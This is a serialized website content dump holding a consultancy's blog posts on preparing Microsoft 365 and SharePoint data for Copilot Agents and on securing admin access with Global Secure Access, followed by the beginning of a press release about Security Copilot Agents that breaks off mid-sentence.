platform",[12,21337,47],{},[12,21339,21340],{},"As you can probably think of, not every platform supports every use case. Agents can be used for simple tasks, like answering questions based on existing knowledge or complex, like automatically generating answers or executing processes. Also, the final UX where and how we want to access those agents is important to decide for a platform.",[12,21342,21343],{},[2642,21344],{"alt":21345,"src":21346},"Diagram showing three levels of agent capabilities from simple to advanced","https://res.cloudinary.com/c4a8/image/upload/blog/pics/agents-differences.png",[12,21348,21349],{},"With these considerations in mind, we usually try to use the easiest solution possible to build our Agent. But also, we need to find the solution that is scalable for further development. But not every Agent needs to built on Agent AI Foundry from the very beginning.",[12,21351,21352],{},[251,21353,21354],{},"Tip:",[2110,21356,21357],{},[12,21358,21359],{},"If you are not sure where to start to build your Agent, you always can use Copilot Studio and either integrate more Data from Azure AI there and publish it to Microsoft 365 Copilot. So get both \"up- and downwards compatibility\".",[41,21361,21363],{"id":21362},"rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG (Retrieval-Augumented Generation) vs. SharePoint vs. Upload",[12,21365,31],{},[12,21367,21368,21369,21372],{},"Looking at it the first time, everything seems to be RAG – but there are differences! When you first explore Copilot Agents and its agent capabilities, it’s tempting to assume that all knowledge integration follows the same RAG (Retrieval-Augmented Generation) pattern. While they may all ",[3456,21370,21371],{},"look"," like RAG from the outside: retrieving documents and generating answers, the way they work under the hood differs significantly. Understanding these differences is essential for choosing the right approach based on your goals, scale, and technical readiness. Here is a short explanation and overview",[186,21374,21376],{"id":21375},"manual-file-uploads","Manual File Uploads",[12,21378,47],{},[12,21380,21381,21382,21385],{},"Manual upload is the simplest way to add knowledge to a Copilot agent. You drag and drop documents directly into the Copilot Studio interface. Microsoft automatically indexes these files and retrieves relevant content during a user query. This is ideal for small pilots and early testing. ",[251,21383,21384],{},"Also, be aware that the content of the files should be accessible to everyone with access to agent",". There is not Permission-Management here that you need to take care of. On the other hand, you will need to manually update these files in the long term if things change. Currently for Copilot Agents you can add up to 20 files manually.",[12,21387,21388,21389],{},"Source: ",[2672,21390,21393],{"href":21391,"rel":21392},"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge",[2676],"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge#file-size-limits",[186,21395,21397],{"id":21396},"sharepoint-online","SharePoint Online",[12,21399,47],{},[12,21401,21402],{},"This method uses Microsoft’s Retrieval API to access content directly from SharePoint Online connected via Graph Connector. The agent retrieves the most relevant content live at query time, respecting existing Microsoft 365 permissions. Content can be SharePoint sites, document libraries, folders or files. It’s dynamic, secure, and well-suited for scaling across departments or business units without managing your own infrastructure. Building up on the existing infrastructure, we are using the built-in security model from SharePoint with is a huge benefit compared to other knowledge options. Departments can easily update the files and that will be reflected within the agent. That means if two users with different access levels ask the agent, one might get an answer from a certain file while another user (without access) would not – which is exactly the behavior we want.",[12,21404,21405],{},"Note: SharePoint Lists are currently a not supported knowledge-type, so you can not index them out of the box (Q3 2025)",[186,21407,21409],{"id":21408},"custom-rag-self-managed","Custom RAG (Self-Managed)",[12,21411,47],{},[12,21413,21414],{},"In a classic RAG setup, you build and manage the entire retrieval pipeline yourself. That includes document preprocessing, chunking, embedding, storing in a vector database, and retrieving the top matches at query time. This gives you full control over how content is processed and retrieved, but it also brings complexity and maintenance overhead. It’s best suited for advanced use cases that require customization beyond what Microsoft’s managed services offer. This is not an in-built feature in Copilot or Copilot Studio; we would do this in Microsoft Azure.",[12,21416,21417],{},"A example when to use RAG could be for instance, If you needed to integrate an AI agent with a proprietary database or thousands of PDFs stored outside of Microsoft 365, and apply custom filters, a self-managed RAG might be necessary – but this requires significant effort.",[12,21419,21420,21421],{},"source: ",[2672,21422,21423],{"href":21423,"rel":21424},"https://learn.microsoft.com/en-us/azure/search/retrieval-augmented-generation-overview?tabs=docs",[2676],[186,21426,21428],{"id":21427},"what-to-choose-and-when","What to Choose and When",[12,21430,47],{},[12,21432,21433],{},"While all three approaches involve retrieving content to support language generation, only the custom self-managed solution qualifies as “true RAG” in the technical sense. For most organizations starting out, manual uploads or SharePoint connections are significantly easier and faster to implement. They provide strong results with minimal setup - and they let teams focus on use case design and adoption, rather than infrastructure.",[12,21435,21436],{},"A general advice from my side in this point:",[2110,21438,21439],{},[12,21440,21441],{},"Try to build the agents as close to your data as possible",[12,21443,21444],{},"Example: If your data is stored in large SQL databases or external CRM systems, a SharePoint Agent will not do the job. If we have all our knowledge in SharePoint, SharePoint Agents or Copilot Agents might be a good start.",[12,21446,21447],{},"Custom RAG should be considered only when your needs go beyond what the managed options can provide, not as the default starting point. A manual upload is great for the first pilot or for small pilots with limited and specific knowledge that is not often updated. In many scenarios we would just use a SharePoint library or site with the agent. Because of this, we are focusing on a scenario looking like that:",[41,21449,21451],{"id":21450},"microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","Microsoft 365 Copilot & Copilot Agents: Security & Compliance out of the box",[12,21453,31],{},[12,21455,21456,21459],{},[251,21457,21458],{},"Secure cloud infrastructure"," is the bedrock for enterprise AI. Microsoft provides the most secure framework possible for our Agents by putting them in context of Microsoft 365 Copilot. Every organization can trust their existing Security Framework based on Conditional Access and Multi-Factor authentication for access and their existing Governance Framework based on Microsoft Purview.",[12,21461,21462],{},"Agents that are used in M365 Copilot or published from Copilot Studio as a Teams Chatbot are only accessible within our tenant boundaries. That means we get the same level of security for these applications that we already have.",[12,21464,21465],{},[2642,21466],{"alt":21467,"src":21468},"Diagram showing how Microsoft 365 Copilot accesses user data within Microsoft 365.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/copilot-security.png",[12,21470,21471],{},"In addition to that, Microsoft offers several technical and organization commitments gathered as we call it \"Enterprise Grade Data Protection\".",[12,21473,21388,21474],{},[2672,21475,21099],{"href":21099,"rel":21476},[2676],[186,21478,21480],{"id":21479},"microsoft-365-copilot-enterprise-data-protection-edp-for-prompts-and-responses","Microsoft 365 Copilot: Enterprise Data Protection (EDP) for Prompts and Responses",[12,21482,47],{},[1254,21484,21485,21504,21510,21530,21536],{},[1257,21486,21487,21490,21491,2901,21494,21497,21498,2901,21501,1013],{},[251,21488,21489],{},"Contractual Protection",": Prompts (user input) and responses (Copilot output) are protected under the ",[251,21492,21493],{},"Data Protection Addendum (DPA)",[251,21495,21496],{},"Product Terms",". These protections are the same as those applied to ",[251,21499,21500],{},"emails in Exchange",[251,21502,21503],{},"files in SharePoint",[1257,21505,21506,21509],{},[251,21507,21508],{},"Data Security:"," Encryption at rest and in transit, Physical security controls, Tenant-level data isolation",[1257,21511,21512,21515,21516,21519,21520,805,21523,805,21526,21529],{},[251,21513,21514],{},"Privacy Commitments"," Microsoft acts as a ",[251,21517,21518],{},"data processor",", using data only as instructed by the customer. Supports ",[251,21521,21522],{},"GDPR",[251,21524,21525],{},"EU Data Boundary",[251,21527,21528],{},"ISO/IEC 27018",", and more.",[1257,21531,21532,21535],{},[251,21533,21534],{},"Access Control & Policy Inheritance",": Copilot respects: Identity models and permissions, Sensitivity labels, Retention policies, Audit settings, Admin configurations, AI & Copyright Risk Mitigation and Protection against: Prompt injection, Harmful content, Copyright issues (via protected material detection and Customer Copyright Commitment)",[1257,21537,21538,21541],{},[251,21539,21540],{},"No Model Training:"," Prompts, responses, and Microsoft Graph data are NOT used to train foundation models.",[186,21543,21545],{"id":21544},"copilot-agents-with-sharepoint-online-knowledge","Copilot Agent's with SharePoint Online-Knowledge:",[12,21547,47],{},[1254,21549,21550,21560],{},[1257,21551,21552,21555,21556,21559],{},[251,21553,21554],{},"Permission & Sharing Model:"," Agents with SharePoint Online access always respects the permissions of the associated SharePoint site. That means, ",[251,21557,21558],{},"on one hand, you need to ensure that everyone who should have access has at least read permissions on the site","; on the other hand, you must be vigilant about not granting unnecessary permissions that could expose sensitive information to unauthorized users**. Properly configuring permissions is essentia**l, as Copilot Agents will only be able to access and surface content that the querying user is permitted to see. Additionally, leveraging Microsoft Purview information protection ensures that sensitivity labels and data loss prevention (DLP) policies persist with the content",[1257,21561,21562,21565,21566,21569],{},[251,21563,21564],{},"Persistent Labels & DLP:"," Enable ",[251,21567,21568],{},"Microsoft Purview"," information protection so that sensitivity labels persist with content. Copilot agents inherit labels on source documents. Meaning if a file is classified “Confidential,” any AI-generated content or document from now on, will carry that label forward. This persistent label inheritance works in tandem with Data Loss Prevention policies to prevent AI from inadvertently exposing protected data. In practice, that means even if Copilot summarizes a sensitive file, the summary will be handled as sensitive too. This is something outstanding we do not find outside of Microsoft 365 and we won't see any AI Agent that is able to deeply integrate like this in the Microsoft 365 ecosystem!",[41,21571,21573],{"id":21572},"best-practices-to-prepare-further-sharepoint-online-for-agent-use","Best Practices to prepare further SharePoint Online for Agent use",[12,21575,31],{},[12,21577,21578],{},"To prepare SharePoint Online for effective use with Copilot Agents, follow these best practices:",[186,21580,21582],{"id":21581},"dedicated-sharepoint-site","Dedicated SharePoint Site",[12,21584,47],{},[12,21586,21587],{},"First, create a dedicated SharePoint site or a specific folder designed exclusively for your Copilot Agent’s knowledge base. This approach helps minimize issues related to oversharing and reduces the risk of users accidentally uploading sensitive or irrelevant files to the agent’s accessible repository. If you decide to use an existing SharePoint site, carefully review its contents to ensure that no confidential or sensitive information is stored there that should not be discoverable by the agent.",[186,21589,21591],{"id":21590},"granting-access","Granting Access",[12,21593,47],{},[12,21595,21596,21597,21600],{},"It is also important to ensure that all intended users have the necessary read permissions to access the site or folder. If you need to grant access manually, Ensure all intended users have read access to the site (for example, by ",[251,21598,21599],{},"adding them to the SharePoint site’s Visitors group"," or an appropriate Azure AD security group) to simplify the process and prevent accidental permission misconfigurations.",[186,21602,21604],{"id":21603},"prepare-files","Prepare Files",[12,21606,47],{},[12,21608,21609,21610,21613,21614,21617],{},"When preparing documents for use with Copilot Agents, remember that the AI currently ",[251,21611,21612],{},"cannot interpret embedded images within"," files. ",[251,21615,21616],{},"Therefore, add descriptive image captions or alternative text"," to help ensure that important visual information is not lost. For text-heavy documents, make sure When summarizing or referencing content, keep the total to a maximum of 1.5 million words or 300 pages to ensure Copilot works effectively.",[12,21619,21620,21621,21624],{},"For ",[251,21622,21623],{},"Excel files",", organize your data so that each file focuses either on numbers or on text, as mixed-content tables tend to yield less accurate results. Agents also respond most reliably to queries when the relevant data is contained within a single sheet of the workbook.",[12,21626,21627],{},[3456,21628,21629],{},"Agents respond best to Excel data when it’s contained in one sheet.",[12,21631,21632],{},"Example: If you have a large customer feedback survey stored in a single Excel file, separate the quantitative data (such as ratings and numerical responses) from the qualitative data (such as free-text feedback) into two different sheets. This method allows you to use tools like Python and Excel formulas to efficiently analyze the numerical data (e.g., calculate averages, sort results, determine confidence levels), while leveraging M365 Copilot’s sentiment analysis features to gain insights from the text-based feedback.",[186,21634,21636],{"id":21635},"file-limitations","File Limitations",[12,21638,47],{},[12,21640,21641,21642],{},"Finally, be aware of the file types and size limitations supported by Copilot Agents and Copilot Studio. The following table outlines current support:",[2672,21643,21393],{"href":21391,"rel":21644},[2676],[12,21646,21647,21648],{},"Also acknowledge those best practices Microsoft has shared on document lengths: ",[2672,21649,21650],{"href":21650,"rel":21651},"https://support.microsoft.com/en-gb/topic/keep-it-short-and-sweet-a-guide-on-the-length-of-documents-that-you-provide-to-copilot-66de2ffd-deb2-4f0c-8984-098316104389",[2676],[21653,21654],"v-table",{":head":3821,":hide-container":3821,":table":21655},"fileLimitations",[12,21657,21658],{},"Currently unsupported Filetypes in SharePoint Online: Officially everything else that is not listed there, is not officially supported.",[12,21660,21661],{},"Certain file types, such as CSV files, may function adequately even though they are not officially supported because they closely resemble plain text formats. However, most other file types—particularly container files like CAB, EXE, ZIP, as well as image, video, and audio formats such as PNG, IMG, MP3, and MP4—are not supported at this time.",[41,21663,21665],{"id":21664},"final-thoughts","Final thoughts",[12,21667,31],{},[12,21669,21670],{},"By following these recommendations, you can ensure that your Copilot Agents have access to well-structured, secure, and high-quality data, maximizing their usefulness and minimizing the risk of accidental data exposure. Investing time in preparing your SharePoint environment sets a strong foundation for successful AI agent deployment and adoption within your organization.",[12,21672,21673],{},"In fact many of our \"Build-an-Agent\" projects starting exactly with that. Not building the agent, but preparing the infrastructure and knowledge that we have a good quality data to use for the AI, because the Agent is only as good as the system beneath it!",{"title":65,"searchDepth":111,"depth":111,"links":21675},[21676,21677,21678,21691,21695,21701,21705,21711],{"id":8257,"depth":111,"text":8258},{"id":21055,"depth":111,"text":21056},{"id":21126,"depth":111,"text":21127,"children":21679},[21680,21681,21682,21683,21685,21686,21687,21688,21689,21690],{"id":21135,"depth":329,"text":21136},{"id":21144,"depth":329,"text":21145},{"id":21157,"depth":329,"text":21158},{"id":21174,"depth":329,"text":21684},"Step 4: Generate a SharePoint Online Baseline Report",{"id":21206,"depth":329,"text":21207},{"id":21215,"depth":329,"text":21216},{"id":21228,"depth":329,"text":21229},{"id":21237,"depth":329,"text":21238},{"id":21254,"depth":329,"text":21255},{"id":21263,"depth":329,"text":21264},{"id":21296,"depth":111,"text":21297,"children":21692},[21693,21694],{"id":21302,"depth":329,"text":21303},{"id":21334,"depth":329,"text":21335},{"id":21362,"depth":111,"text":21363,"children":21696},[21697,21698,21699,21700],{"id":21375,"depth":329,"text":21376},{"id":21396,"depth":329,"text":21397},{"id":21408,"depth":329,"text":21409},{"id":21427,"depth":329,"text":21428},{"id":21450,"depth":111,"text":21451,"children":21702},[21703,21704],{"id":21479,"depth":329,"text":21480},{"id":21544,"depth":329,"text":21545},{"id":21572,"depth":111,"text":21573,"children":21706},[21707,21708,21709,21710],{"id":21581,"depth":329,"text":21582},{"id":21590,"depth":329,"text":21591},{"id":21603,"depth":329,"text":21604},{"id":21635,"depth":329,"text":21636},{"id":21664,"depth":111,"text":21665},{"lang":2171,"seoTitle":21713,"titleClass":2173,"date":21714,"categories":21715,"blogtitlepic":21716,"socialimg":21717,"customExcerpt":21718,"keywords":21719,"maxContent":2181,"fileLimitations":21720,"textImageTeaser":21746,"asideNav":21757,"hreflang":21777,"footer":21782,"scripts":21783,"published":2181},"How to Prepare Your M365 Data for Copilot Agents","2025-08-28",[2810],"head-microsoft-copilot.jpg","/blog/heads/head-microsoft-copilot.jpg","Before Microsoft 365 Copilot Agents can deliver real value, the foundation must be solid: clean data, proper permissions, and a reliable infrastructure. This guide explains why data quality determines AI success, highlights risks like oversharing and silos, and outlines 10 practical steps to make your M365 environment agent-ready—secure, compliant, and scalable.","Microsoft 365 Copilot, Copilot Agents, M365 data governance, AI readiness, SharePoint data security, M365 infrastructure, oversharing prevention, AI data preparation, Microsoft 365 security, agent-ready M365",[21721,21725,21729,21732,21735,21737,21739,21741,21742,21744],[21722,21723,21724],"File type","SharePoint Online - Limit","Manual Upload - Limit",[21726,21727,21728],".doc","150 MB","100 MB",[21730,21731,21728],".docx","512 MB",[21733,21727,21734],".html","not supported",[21736,21731,21728],".pdf",[21738,21727,21728],".ppt",[21740,21731,21728],".pptx",[15305,21727,21728],[21743,21727,21728],".xls",[21745,21727,21728],".xlsx",{"image":21747,"cloudinary":2181,"alt":21748,"bgColor":21749,"offset":2181,"white":2181,"list":21750,"left":2168,"float":2168,"firstColWidth":650,"secondColWidth":662,"copyClasses":8128,"headline":21754,"subline":21755,"spacing":21756},"/icons/icon-copilot.svg","Copilot Icon","#543b9c",[21751],{"ctaText":21752,"ctaHref":21753,"ctaType":6003,"external":2181},"Secure your spot now – free of charge!","https://events.teams.microsoft.com/event/53a92e2c-9206-488d-9602-831864212207@a53834b7-42bc-46a3-b004-369735c3acf9","Agent-Ready Infrastructure – Your Foundation for Productive Copilot Agents","\u003Cp>AI is only as good as the infrastructure it runs on. If you want to use Copilot Agents seriously in practice, you need more than just licensing and activation. It’s all about structured data, consistent governance, and a well-thought-out architecture that scales—in short: an Agent-Ready Infrastructure.\u003Cbr /> \u003Cbr /> In our English-language session, you’ll learn:\u003C/p> \u003Cul> \u003Cli>Why data quality and information architecture are critical to success\u003C/li> \u003Cli>How to get your Microsoft 365 environment ready for productive agents\u003C/li> \u003Cli>And which levers you need to pull today so your company truly benefits from AI tomorrow\u003C/li> \u003C/ul> ","space-top-2 space-bottom-2 mt-10",{"menuItems":21758},[21759,21762,21765,21768,21771,21774],{"href":21760,"text":21761},"#why-your-infrastructure-data-matters","Why Infrastructure Matters",{"href":21763,"text":21764},"#_10-steps-to-improve-your-m365-data-infrastructure-now","10 Steps for M365 Data",{"href":21766,"text":21767},"#understanding-differences-between-agent-platforms","Understanding Agent Platform",{"href":21769,"text":21770},"#rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG vs. SharePoint vs. Upload",{"href":21772,"text":21773},"#microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","M365 Copilot: Security",{"href":21775,"text":21776},"#best-practices-to-prepare-further-sharepoint-online-for-agent-use","SharePoint Best Practices",[21778,21780],{"lang":2260,"href":21779},"/de/posts/2025-08-26-agent-ready-infrastructure",{"lang":2263,"href":21781},"/es/posts/2025-08-26-agent-ready-infrastructure",{"noMargin":2181},{"slick":2181},"/posts/2025-08-28-agent-ready-infrastructure-copy",{"title":21032,"description":65},"posts/2025-08-28-agent-ready-infrastructure copy",[21788,21789,21790,21791],"Microsoft 365 Copilot","M365 Data Governance","SharePoint Security","AI Data Preparation","w57R3glic_nCG_VCxOCqp3hNggKDkLiX_lPqMU2a1Nk",{"id":21794,"title":21795,"author":21796,"body":21797,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22009,"moment":2166,"navigation":2181,"path":22039,"seo":22040,"stem":22041,"tags":22042,"webcast":2168,"__hash__":22043},"content_en/posts/2025-09-25-gsa-unlocked.md","Global Secure Access Unlocked",[2373,2530],{"type":9,"value":21798,"toc":21995},[21799,21803,21805,21808,21811,21814,21818,21820,21823,21828,21831,21836,21839,21844,21848,21850,21853,21857,21859,21862,21865,21868,21871,21876,21880,21882,21885,21893,21898,21902,21904,21907,21910,21913,21918,21922,21924,21927,21930,21933,21938,21942,21944,21947,21950,21953,21961,21964,21969,21973,21975,21978,21981,21985,21987,21989,21992],[41,21800,21802],{"id":21801},"what-is-a-managed-red-tenant","What is a Managed Red Tenant?",[12,21804,31],{},[12,21806,21807],{},"The Managed Red Tenant combines our extensive experience in managed services with proven blueprints in the areas of workplace, Azure, and security.",[12,21809,21810],{},"The result: An isolated, fully cloud-based as-code managed environment that effectively protects administrative users and endpoints – even in target environments with multiple Microsoft Entra tenants and Active Directory domains.",[12,21812,21813],{},"Our solution relies on native, cloud-based identity and security features from Microsoft and strictly adheres to Zero Trust principles.",[186,21815,21817],{"id":21816},"global-secure-access-as-security-service-edge","Global Secure Access as Security Service Edge",[12,21819,47],{},[12,21821,21822],{},"We have integrated the latest innovations from Global Secure Access into various components of the Managed Red Tenant to enhance security when accessing Virtual Access Workstations (VAWs) and to protect and restrict outgoing privileged access.",[12,21824,21825],{},[251,21826,21827],{},"Microsoft Entra Internet Access",[12,21829,21830],{},"functioning as an identity-centric Secure Web Gateway (SWG), has been implemented to block public internet access and restrict connectivity to privileged interfaces and the authorized company’s tenant environments only. Additional features, such as Universal Conditional Access Evaluation (CAE), enable near real-time access blocking.",[12,21832,21833],{},[251,21834,21835],{},"Microsoft Entra Private Access",[12,21837,21838],{},"serves as an identity-centric Zero Trust Network Access (ZTNA) solution and is the core of our approach to providing secure and private access to VAWs. Its integration into our solution adds an extra layer of protection for privileged sessions on AVD-based endpoints by enforcing Conditional Access on the accessing client before establishing connectivity to the VAW. Securing access and applying Zero Trust principle to manage private or on-premises resources is another use cases where we take benefit of Private Access.",[12,21840,21841],{},[2642,21842],{"alt":7092,"src":21843},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-01.png",[41,21845,21847],{"id":21846},"use-cases-for-global-secure-access-in-the-managed-red-tenant","Use Cases for Global Secure Access in the Managed Red Tenant",[12,21849,31],{},[12,21851,21852],{},"Global Secure Access is one of the core components in the design of our Managed Red Tenant, and we’re excited to elevate both security and usability to a new level. The added value becomes most evident when looking at the individual use cases, which we’ll showcase in this blog.",[186,21854,21856],{"id":21855},"access-to-virtual-access-workstations","Access to Virtual Access Workstations",[12,21858,47],{},[12,21860,21861],{},"Some organizations choose not to equip all administrators with physical Privileged Admin Workstations (PAWs). For these low-privileged admins, we offer what we call Virtual Access Workstations (VAWs).",[12,21863,21864],{},"The most critical aspect here is secure access to the VAWs, and we consider it essential to establish a high level of security—where Entra Private Access plays a key role.",[12,21866,21867],{},"Administrators connect to the VAWs from their enterprise devices and sign in using their account from the Managed Red Tenant. Because of this identity switch, the accessing user is sourced from a different tenant than the the original device and will not able to present a device compliance status.",[12,21869,21870],{},"Therefore, we are using global secure access for pre-authentication using the original user from the device. Since our VAWs do not expose public endpoints and are only accessible via Entra Private Access, we can secure network access to a very high degree. Conditional Access in the workforce environment enforces strong user and device authentication, including device compliance and risk-based controls.",[12,21872,21873],{},[2642,21874],{"alt":7092,"src":21875},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-02.png",[186,21877,21879],{"id":21878},"secure-web-filtering","Secure Web Filtering",[12,21881,47],{},[12,21883,21884],{},"A key characteristic of administrative devices is their strictly limited access to applications, designed to minimize the attack surface as much as possible. While local solutions such as proxy.pac files or shared centralized proxies (not T0 exclusive) were commonly used in the past, we’ve opted for Entra Internet Access for devices within the Managed Red Tenant.",[1254,21886,21887,21890],{},[1257,21888,21889],{},"Internet access is only permitted from compliant devices and after strong user authentication",[1257,21891,21892],{},"Access is restricted to explicitly approved URLs, and since HTTPS traffic (where possible) is decrypted and inspected, it’s also feasible to limit access to specific paths—for example, within Azure DevOps or GitHub",[12,21894,21895],{},[2642,21896],{"alt":7092,"src":21897},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-03.png",[186,21899,21901],{"id":21900},"tenant-restrictions-for-saas-services-and-administrative-interfaces","Tenant Restrictions for SaaS Services and Administrative Interfaces",[12,21903,47],{},[12,21905,21906],{},"In SaaS services and administrative interfaces, it’s common for URLs to be identical across all tenants, which makes them difficult to control using the web filtering methods described above.",[12,21908,21909],{},"To ensure that only accounts from the Managed Red Tenant can sign in to Microsoft’s approved portals from an administrative device, we leverage the Tenant Restriction feature of Global Secure Access.",[12,21911,21912],{},"Through Entra Internet Access, Entra ID is signaled which tenants are permitted for sign-in. This guarantees that all policies from the Managed Red Tenant are enforced and that administrative access occurs exclusively via B2B collaboration.",[12,21914,21915],{},[2642,21916],{"alt":7092,"src":21917},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-04.png",[186,21919,21921],{"id":21920},"on-premises-access","On-Premises Access",[12,21923,47],{},[12,21925,21926],{},"Of course, a Managed Red Tenant can also be used to administer on-premises and IaaS environments, which requires secure access to the datacenters. Entra Private Access provides us with Zero Trust Network Access that combines top-tier security standards with a flexible architecture and strong performance.",[12,21928,21929],{},"Access to datacenters and IaaS environments depends on robust user and device authentication, including device compliance and risk-based controls.",[12,21931,21932],{},"Managing individual targets as app segments enables granular access control, which is automated using Entra Governance features. This extends functions already widely used in the Managed Red Tenant—such as Just-In-Time administration and approval workflows—into the network layer.",[12,21934,21935],{},[2642,21936],{"alt":7092,"src":21937},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-05.png",[186,21939,21941],{"id":21940},"revocation-access-in-near-real-time","Revocation Access in Near Real-Time",[12,21943,47],{},[12,21945,21946],{},"Zero Trust also means being prepared to quickly and effectively contain threats—even within the most secure architecture—and to isolate compromised components.",[12,21948,21949],{},"In a Managed Red Tenant environment, we’re not only prepared for the compromise of users and devices within the tenant itself, but also for the (most likely) scenario where an attack originates from an admin’s office PC and then propagates to the Virtual Admin Workstation.",[12,21951,21952],{},"Thanks to the Universal Continuous Access Evaluation (CAE) feature in Global Secure Access, the following actions are automatically triggered:",[1254,21954,21955,21958],{},[1257,21956,21957],{},"Access to the Virtual Admin Workstation via Entra Private Access is interrupted if, for example, the user risk level of the account in the Workforce Tenant is set to High",[1257,21959,21960],{},"Access to admin interfaces and the datacenter environment is revoked if, for example, the sessions of the account in the Managed Red Tenant are terminated",[12,21962,21963],{},"Additionally, full isolation of all devices and accounts within the Managed Red Tenant can be initiated at any time by the integrated CSOC service.",[12,21965,21966],{},[2642,21967],{"alt":7092,"src":21968},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-06.png",[186,21970,21972],{"id":21971},"enriched-sign-ins-and-token-insights","Enriched Sign-Ins and Token Insights",[12,21974,47],{},[12,21976,21977],{},"Beyond its many features for access control, Global Secure Access is a true game changer when it comes to logging. We gain significantly more telemetry from the network layer and can correlate it with existing sign-in and audit logs.",[12,21979,21980],{},"This enables our CSOC to identify which actions were still performed after containment was triggered—for example, in cases where not all tokens supported Continuous Access Evaluation (CAE).",[12,21982,21983],{},[2642,21984],{"alt":7092,"src":21968},[41,21986,21665],{"id":21664},[12,21988,31],{},[12,21990,21991],{},"This blog is published alongside a webcast where we explore the Managed Red Tenant, Global Secure Access, the integration process, and the relevant use cases, supported by live demos.",[12,21993,21994],{},"If this blog has sparked your interest, we definitely encourage you to check out the webcast. And of course, we’re always happy to hear from you directly!",{"title":65,"searchDepth":111,"depth":111,"links":21996},[21997,22000,22008],{"id":21801,"depth":111,"text":21802,"children":21998},[21999],{"id":21816,"depth":329,"text":21817},{"id":21846,"depth":111,"text":21847,"children":22001},[22002,22003,22004,22005,22006,22007],{"id":21855,"depth":329,"text":21856},{"id":21878,"depth":329,"text":21879},{"id":21900,"depth":329,"text":21901},{"id":21920,"depth":329,"text":21921},{"id":21940,"depth":329,"text":21941},{"id":21971,"depth":329,"text":21972},{"id":21664,"depth":111,"text":21665},{"lang":2171,"seoTitle":22010,"titleClass":2173,"date":22011,"categories":22012,"blogtitlepic":22013,"socialimg":22014,"customExcerpt":22015,"keywords":22016,"maxContent":2181,"textImageTeaser":22017,"asideNav":22026,"hreflang":22034,"footer":22037,"scripts":22038,"published":2181},"Securing Microsoft 365 Admin Access with Entra and Global Secure Access","2025-09-25",[2176],"head-gsa-unlocked.jpg","/blog/heads/head-gsa-unlocked.jpg","This blog explores how Microsoft Global Secure Access enhances security and control in our Managed Red Tenant. With Entra Internet Access and Private Access, organizations can secure admin sessions, enforce Zero Trust, and streamline access to cloud and on-prem resources. Real-world use cases and architecture insights show how to protect M365 environments effectively.","Microsoft Global Secure Access, Entra Internet Access, Entra Private Access, Managed Red Tenant, Zero Trust, M365 security, conditional access, admin access control, secure web filtering, virtual admin workstations, CAE, tenant restrictions, Microsoft 365, cloud security",{"image":22018,"cloudinary":2181,"alt":21748,"bgColor":22019,"offset":2181,"white":2181,"list":22020,"left":2168,"float":2168,"firstColWidth":650,"secondColWidth":662,"copyClasses":8128,"headline":22024,"subline":22025,"spacing":21756},"/icons/shape-managed-red-tenant.svg","#E44418",[22021],{"ctaText":22022,"ctaHref":22023,"ctaType":6003,"external":2181},"Watch the full session on YouTube","https://youtu.be/SpEOIdoA-uc","Global Secure Access Unlocked: Real World Implementation in Managed Red Tenant","\u003Cp>In the Managed Red Tenant, we enforce strict separation for privileged access. Live demos will show how we secure admin workflows using Global Secure Access.\u003Cbr /> \u003Cbr /> In our English-language session, you’ll learn:\u003C/p> \u003Cul> \u003Cli>How PAWs and VAWs with identity switching create secure admin workstations\u003C/li> \u003Cli>How Tenant Restrictions and Cross-Tenant Access Policies allow only authorized access\u003C/li> \u003Cli>How Per-App Tunnels and Continuous Access Evaluation are replacing traditional VPNs\u003C/li> \u003Cli>How Just-in-Time administration works in practice with Microsoft PIM\u003C/li> \u003C/ul> ",{"menuItems":22027},[22028,22030,22032],{"href":22029,"text":21802},"#what-is-a-managed-red-tenant",{"href":22031,"text":21847},"#use-cases-for-global-secure-access-in-the-managed-red-tenant",{"href":22033,"text":21665},"#final-thoughts",[22035,22036],{"lang":2260,"href":21779},{"lang":2263,"href":21781},{"noMargin":2181},{"slick":2181},"/posts/2025-09-25-gsa-unlocked",{"title":21795,"description":65},"posts/2025-09-25-gsa-unlocked",[21788,21789,21790,21791,6236],"fa9cSgWNIC3cl6ZixVtMGvI-KMd_q6EyoL3Sm6gH2hE",{"id":22045,"title":22046,"author":22047,"body":22048,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22149,"moment":2166,"navigation":2181,"path":22190,"seo":22191,"stem":22192,"tags":22193,"webcast":2168,"__hash__":22197},"content_en/posts/2025-09-30-security-store.md","First Worldwide: glueckkanja Security Copilot Agents",[2461],{"type":9,"value":22049,"toc":22144},[22050,22054,22056,22059,22061,22064,22067,22070,22073,22077,22084,22086,22096,22107,22126,22137],[41,22051,22053],{"id":22052},"at-the-launch-of-the-microsoft-security-store-glueckkanja-introduced-10-security-copilot-agents","At the launch of the Microsoft Security Store, glueckkanja introduced 10 Security Copilot Agents",[12,22055,31],{},[12,22057,22058],{},"Offenbach, Germany – September 30, 2025 – glueckkanja today announced its inclusion in the Microsoft Security Store Partner Ecosystem. As one of the very first partners, glueckkanja was selected based on their proven experience with Microsoft Security technologies, willingness to explore and provide feedback on cutting edge functionality, and close relationship with Microsoft.",[5082,22060],{":quotes":5082,":no-fullscreen":3821},[52,22062],{"style":22063},"padding-top:50px;",[12,22065,22066],{},"glueckkanja is collaborating with Microsoft to help shape the development of the Microsoft Security Store, providing feedback on new features, integration experiences, and customer needs. By publishing certified solutions and AI agents that integrate seamlessly with Microsoft Security products, glueckkanja is making it easier for organizations to discover, purchase, and deploy trusted security technologies. Through the Security Store, glueckkanja is helping customers accelerate their security outcomes and simplify operations with solutions that are vetted, easy to deploy, and designed to work together.",[12,22068,22069],{},"The Microsoft Security Store simplifies how organizations discover, purchase, and deploy trusted solutions and AI agents. With certified integrations, simplified billing, and accelerated 